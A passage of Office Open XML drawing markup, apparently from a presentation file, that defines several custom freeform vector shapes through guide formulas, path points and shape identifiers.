                  <a:gd name="T82" fmla="*/ 69 w 108"/>
                  <a:gd name="T83" fmla="*/ 67 h 96"/>
                  <a:gd name="T84" fmla="*/ 83 w 108"/>
                  <a:gd name="T85" fmla="*/ 76 h 96"/>
                  <a:gd name="T86" fmla="*/ 102 w 108"/>
                  <a:gd name="T87" fmla="*/ 81 h 96"/>
                  <a:gd name="T88" fmla="*/ 105 w 108"/>
                  <a:gd name="T89" fmla="*/ 63 h 96"/>
                  <a:gd name="T90" fmla="*/ 95 w 108"/>
                  <a:gd name="T91" fmla="*/ 60 h 96"/>
                  <a:gd name="T92" fmla="*/ 74 w 108"/>
                  <a:gd name="T93" fmla="*/ 62 h 96"/>
                  <a:gd name="T94" fmla="*/ 71 w 108"/>
                  <a:gd name="T95" fmla="*/ 58 h 96"/>
                  <a:gd name="T96" fmla="*/ 82 w 108"/>
                  <a:gd name="T97" fmla="*/ 60 h 96"/>
                  <a:gd name="T98" fmla="*/ 105 w 108"/>
                  <a:gd name="T99" fmla="*/ 55 h 96"/>
                  <a:gd name="T100" fmla="*/ 106 w 108"/>
                  <a:gd name="T101" fmla="*/ 39 h 96"/>
                  <a:gd name="T102" fmla="*/ 106 w 108"/>
                  <a:gd name="T103" fmla="*/ 20 h 96"/>
                  <a:gd name="T104" fmla="*/ 93 w 108"/>
                  <a:gd name="T105" fmla="*/ 12 h 96"/>
                  <a:gd name="T106" fmla="*/ 106 w 108"/>
                  <a:gd name="T107" fmla="*/ 16 h 96"/>
                  <a:gd name="T108" fmla="*/ 99 w 108"/>
                  <a:gd name="T109" fmla="*/ 5 h 96"/>
                  <a:gd name="T110" fmla="*/ 87 w 108"/>
                  <a:gd name="T111" fmla="*/ 0 h 9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8"/>
                  <a:gd name="T169" fmla="*/ 0 h 96"/>
                  <a:gd name="T170" fmla="*/ 108 w 108"/>
                  <a:gd name="T171" fmla="*/ 96 h 9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8" h="96">
                    <a:moveTo>
                      <a:pt x="87" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="47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4" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67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9" y="84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3" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87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2" name="Freeform 280">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B97FC42-5671-4F33-A7DD-25CC73567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2286"/>
                <a:ext cx="25" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 21"/>
                  <a:gd name="T2" fmla="*/ 0 w 25"/>
                  <a:gd name="T3" fmla="*/ 1 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 25"/>
                  <a:gd name="T5" fmla="*/ 5 h 21"/>
                  <a:gd name="T6" fmla="*/ 5 w 25"/>
                  <a:gd name="T7" fmla="*/ 7 h 21"/>
                  <a:gd name="T8" fmla="*/ 12 w 25"/>
                  <a:gd name="T9" fmla="*/ 12 h 21"/>
                  <a:gd name="T10" fmla="*/ 14 w 25"/>
                  <a:gd name="T11" fmla="*/ 14 h 21"/>
                  <a:gd name="T12" fmla="*/ 21 w 25"/>
                  <a:gd name="T13" fmla="*/ 17 h 21"/>
                  <a:gd name="T14" fmla="*/ 14 w 25"/>
                  <a:gd name="T15" fmla="*/ 16 h 21"/>
                  <a:gd name="T16" fmla="*/ 8 w 25"/>
                  <a:gd name="T17" fmla="*/ 14 h 21"/>
                  <a:gd name="T18" fmla="*/ 1 w 25"/>
                  <a:gd name="T19" fmla="*/ 14 h 21"/>
                  <a:gd name="T20" fmla="*/ 2 w 25"/>
                  <a:gd name="T21" fmla="*/ 16 h 21"/>
                  <a:gd name="T22" fmla="*/ 12 w 25"/>
                  <a:gd name="T23" fmla="*/ 16 h 21"/>
                  <a:gd name="T24" fmla="*/ 18 w 25"/>
                  <a:gd name="T25" fmla="*/ 20 h 21"/>
                  <a:gd name="T26" fmla="*/ 21 w 25"/>
                  <a:gd name="T27" fmla="*/ 20 h 21"/>
                  <a:gd name="T28" fmla="*/ 24 w 25"/>
                  <a:gd name="T29" fmla="*/ 19 h 21"/>
                  <a:gd name="T30" fmla="*/ 24 w 25"/>
                  <a:gd name="T31" fmla="*/ 16 h 21"/>
                  <a:gd name="T32" fmla="*/ 21 w 25"/>
                  <a:gd name="T33" fmla="*/ 15 h 21"/>
                  <a:gd name="T34" fmla="*/ 19 w 25"/>
                  <a:gd name="T35" fmla="*/ 12 h 21"/>
                  <a:gd name="T36" fmla="*/ 14 w 25"/>
                  <a:gd name="T37" fmla="*/ 8 h 21"/>
                  <a:gd name="T38" fmla="*/ 12 w 25"/>
                  <a:gd name="T39" fmla="*/ 4 h 21"/>
                  <a:gd name="T40" fmla="*/ 7 w 25"/>
                  <a:gd name="T41" fmla="*/ 1 h 21"/>
                  <a:gd name="T42" fmla="*/ 3 w 25"/>
                  <a:gd name="T43" fmla="*/ 0 h 21"/>
                  <a:gd name="T44" fmla="*/ 0 w 25"/>
                  <a:gd name="T45" fmla="*/ 0 h 2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"/>
                  <a:gd name="T70" fmla="*/ 0 h 21"/>
                  <a:gd name="T71" fmla="*/ 25 w 25"/>
                  <a:gd name="T72" fmla="*/ 21 h 2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" h="21">
                    <a:moveTo>
                      <a:pt x="0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2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="17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12" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20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1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12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3" name="Freeform 281">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A634EB-2C59-4C6B-9897-15FD9DB8C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2269"/>
                <a:ext cx="25" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 26"/>
                  <a:gd name="T2" fmla="*/ 0 w 25"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 0 w 25"/>
                  <a:gd name="T5" fmla="*/ 3 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 25"/>
                  <a:gd name="T7" fmla="*/ 4 h 26"/>
                  <a:gd name="T8" fmla="*/ 2 w 25"/>
                  <a:gd name="T9" fmla="*/ 7 h 26"/>
                  <a:gd name="T10" fmla="*/ 5 w 25"/>
                  <a:gd name="T11" fmla="*/ 8 h 26"/>
                  <a:gd name="T12" fmla="*/ 10 w 25"/>
                  <a:gd name="T13" fmla="*/ 11 h 26"/>
                  <a:gd name="T14" fmla="*/ 15 w 25"/>
                  <a:gd name="T15" fmla="*/ 13 h 26"/>
                  <a:gd name="T16" fmla="*/ 19 w 25"/>
                  <a:gd name="T17" fmla="*/ 19 h 26"/>
                  <a:gd name="T18" fmla="*/ 23 w 25"/>
                  <a:gd name="T19" fmla="*/ 23 h 26"/>
                  <a:gd name="T20" fmla="*/ 24 w 25"/>
                  <a:gd name="T21" fmla="*/ 25 h 26"/>
                  <a:gd name="T22" fmla="*/ 23 w 25"/>
                  <a:gd name="T23" fmla="*/ 19 h 26"/>
                  <a:gd name="T24" fmla="*/ 22 w 25"/>
                  <a:gd name="T25" fmla="*/ 14 h 26"/>
                  <a:gd name="T26" fmla="*/ 20 w 25"/>
                  <a:gd name="T27" fmla="*/ 10 h 26"/>
                  <a:gd name="T28" fmla="*/ 17 w 25"/>
                  <a:gd name="T29" fmla="*/ 5 h 26"/>
                  <a:gd name="T30" fmla="*/ 7 w 25"/>
                  <a:gd name="T31" fmla="*/ 0 h 26"/>
                  <a:gd name="T32" fmla="*/ 5 w 25"/>
                  <a:gd name="T33" fmla="*/ 0 h 2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"/>
                  <a:gd name="T52" fmla="*/ 0 h 26"/>
                  <a:gd name="T53" fmla="*/ 25 w 25"/>
                  <a:gd name="T54" fmla="*/ 26 h 2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" h="26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5" y="8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19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7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4" name="Freeform 282">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{250C16F3-5EEC-4B43-A8D0-54C30EE7A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" y="2240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4 w 25"/>
                  <a:gd name="T3" fmla="*/ 11 h 17"/>
                  <a:gd name="T4" fmla="*/ 11 w 25"/>
                  <a:gd name="T5" fmla="*/ 9 h 17"/>
                  <a:gd name="T6" fmla="*/ 15 w 25"/>
                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                  <a:gd name="T8" fmla="*/ 24 w 25"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 18 w 25"/>
                  <a:gd name="T11" fmla="*/ 3 h 17"/>
                  <a:gd name="T12" fmla="*/ 12 w 25"/>
                  <a:gd name="T13" fmla="*/ 5 h 17"/>
                  <a:gd name="T14" fmla="*/ 7 w 25"/>
                  <a:gd name="T15" fmla="*/ 7 h 17"/>
                  <a:gd name="T16" fmla="*/ 5 w 25"/>
                  <a:gd name="T17" fmla="*/ 9 h 17"/>
                  <a:gd name="T18" fmla="*/ 0 w 25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"/>
                  <a:gd name="T31" fmla="*/ 0 h 17"/>
                  <a:gd name="T32" fmla="*/ 25 w 25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" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18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5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5" name="Freeform 283">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF7341D-A29D-4893-945F-719E2457E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270"/>
                <a:ext cx="17" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 40 h 41"/>
                  <a:gd name="T2" fmla="*/ 8 w 17"/>
                  <a:gd name="T3" fmla="*/ 40 h 41"/>
                  <a:gd name="T4" fmla="*/ 10 w 17"/>
                  <a:gd name="T5" fmla="*/ 39 h 41"/>
                  <a:gd name="T6" fmla="*/ 10 w 17"/>
                  <a:gd name="T7" fmla="*/ 37 h 41"/>
                  <a:gd name="T8" fmla="*/ 12 w 17"/>
                  <a:gd name="T9" fmla="*/ 36 h 41"/>
                  <a:gd name="T10" fmla="*/ 14 w 17"/>
                  <a:gd name="T11" fmla="*/ 35 h 41"/>
                  <a:gd name="T12" fmla="*/ 13 w 17"/>
                  <a:gd name="T13" fmla="*/ 33 h 41"/>
                  <a:gd name="T14" fmla="*/ 13 w 17"/>
                  <a:gd name="T15" fmla="*/ 31 h 41"/>
                  <a:gd name="T16" fmla="*/ 16 w 17"/>
                  <a:gd name="T17" fmla="*/ 29 h 41"/>
                  <a:gd name="T18" fmla="*/ 16 w 17"/>
                  <a:gd name="T19" fmla="*/ 26 h 41"/>
                  <a:gd name="T20" fmla="*/ 13 w 17"/>
                  <a:gd name="T21" fmla="*/ 24 h 41"/>
                  <a:gd name="T22" fmla="*/ 13 w 17"/>
                  <a:gd name="T23" fmla="*/ 17 h 41"/>
                  <a:gd name="T24" fmla="*/ 16 w 17"/>
                  <a:gd name="T25" fmla="*/ 12 h 41"/>
                  <a:gd name="T26" fmla="*/ 16 w 17"/>
                  <a:gd name="T27" fmla="*/ 7 h 41"/>
                  <a:gd name="T28" fmla="*/ 16 w 17"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 10 w 17"/>
                  <a:gd name="T31" fmla="*/ 11 h 41"/>
                  <a:gd name="T32" fmla="*/ 5 w 17"/>
                  <a:gd name="T33" fmla="*/ 21 h 41"/>
                  <a:gd name="T34" fmla="*/ 3 w 17"/>
                  <a:gd name="T35" fmla="*/ 32 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 17"/>
                  <a:gd name="T37" fmla="*/ 40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41"/>
                  <a:gd name="T59" fmla="*/ 17 w 17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41">
                    <a:moveTo>
                      <a:pt x="0" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="31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3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32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6" name="Freeform 284">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED14D0DB-90F3-48E6-B745-4B3774CB8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2315"/>
                <a:ext cx="27" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 27"/>
                  <a:gd name="T1" fmla="*/ 8 h 17"/>
                  <a:gd name="T2" fmla="*/ 15 w 27"/>
                  <a:gd name="T3" fmla="*/ 3 h 17"/>
                  <a:gd name="T4" fmla="*/ 10 w 27"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 3 w 27"/>
                  <a:gd name="T7" fmla="*/ 0 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 27"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 27"/>
                  <a:gd name="T11" fmla="*/ 5 h 17"/>
                  <a:gd name="T12" fmla="*/ 4 w 27"/>
                  <a:gd name="T13" fmla="*/ 9 h 17"/>
                  <a:gd name="T14" fmla="*/ 10 w 27"/>
                  <a:gd name="T15" fmla="*/ 13 h 17"/>
                  <a:gd name="T16" fmla="*/ 20 w 27"/>
                  <a:gd name="T17" fmla="*/ 16 h 17"/>
                  <a:gd name="T18" fmla="*/ 26 w 27"/>
                  <a:gd name="T19" fmla="*/ 13 h 17"/>
                  <a:gd name="T20" fmla="*/ 21 w 2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"/>
                  <a:gd name="T34" fmla="*/ 0 h 17"/>
                  <a:gd name="T35" fmla="*/ 27 w 2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" h="17">
                    <a:moveTo>
                      <a:pt x="21" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="3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9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="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7" name="Freeform 285">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB61BB92-4AAD-4908-A578-083C49125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" y="2322"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 17"/>
                  <a:gd name="T1" fmla="*/ 4 h 17"/>
                  <a:gd name="T2" fmla="*/ 4 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 17"/>
                  <a:gd name="T4" fmla="*/ 1 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 17"/>
                  <a:gd name="T9" fmla="*/ 3 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 4 h 17"/>
                  <a:gd name="T12" fmla="*/ 3 w 17"/>
                  <a:gd name="T13" fmla="*/ 8 h 17"/>
                  <a:gd name="T14" fmla="*/ 5 w 17"/>
                  <a:gd name="T15" fmla="*/ 10 h 17"/>
                  <a:gd name="T16" fmla="*/ 10 w 17"/>
                  <a:gd name="T17" fmla="*/ 12 h 17"/>
                  <a:gd name="T18" fmla="*/ 16 w 17"/>
                  <a:gd name="T19" fmla="*/ 16 h 17"/>
                  <a:gd name="T20" fmla="*/ 10 w 17"/>
                  <a:gd name="T21" fmla="*/ 11 h 17"/>
                  <a:gd name="T22" fmla="*/ 9 w 17"/>
                  <a:gd name="T23" fmla="*/ 8 h 17"/>
                  <a:gd name="T24" fmla="*/ 6 w 17"/>
                  <a:gd name="T25" fmla="*/ 4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6" y="4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10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4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8" name="Freeform 286">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDB851B-5514-4605-986E-20260E41D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6" y="2226"/>
                <a:ext cx="37" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 18 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 10 h 19"/>
                  <a:gd name="T4" fmla="*/ 8 w 37"/>
                  <a:gd name="T5" fmla="*/ 7 h 19"/>
                  <a:gd name="T6" fmla="*/ 18 w 37"/>
                  <a:gd name="T7" fmla="*/ 5 h 19"/>
                  <a:gd name="T8" fmla="*/ 26 w 37"/>
                  <a:gd name="T9" fmla="*/ 2 h 19"/>
                  <a:gd name="T10" fmla="*/ 32 w 37"/>
                  <a:gd name="T11" fmla="*/ 0 h 19"/>
                  <a:gd name="T12" fmla="*/ 36 w 37"/>
                  <a:gd name="T13" fmla="*/ 5 h 19"/>
                  <a:gd name="T14" fmla="*/ 29 w 37"/>
                  <a:gd name="T15" fmla="*/ 7 h 19"/>
                  <a:gd name="T16" fmla="*/ 21 w 37"/>
                  <a:gd name="T17" fmla="*/ 10 h 19"/>
                  <a:gd name="T18" fmla="*/ 15 w 37"/>
                  <a:gd name="T19" fmla="*/ 11 h 19"/>
                  <a:gd name="T20" fmla="*/ 8 w 37"/>
                  <a:gd name="T21" fmla="*/ 14 h 19"/>
                  <a:gd name="T22" fmla="*/ 0 w 37"/>
                  <a:gd name="T23" fmla="*/ 18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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 19"/>
                  <a:gd name="T38" fmla="*/ 37 w 37"/>
                  <a:gd name="T39" fmla="*/ 19 h 1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7" h="19">
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5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6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14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69" name="Freeform 287">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D5110D3-031D-4E48-9B56-16919B0E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" y="2327"/>
                <a:ext cx="83" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 83"/>
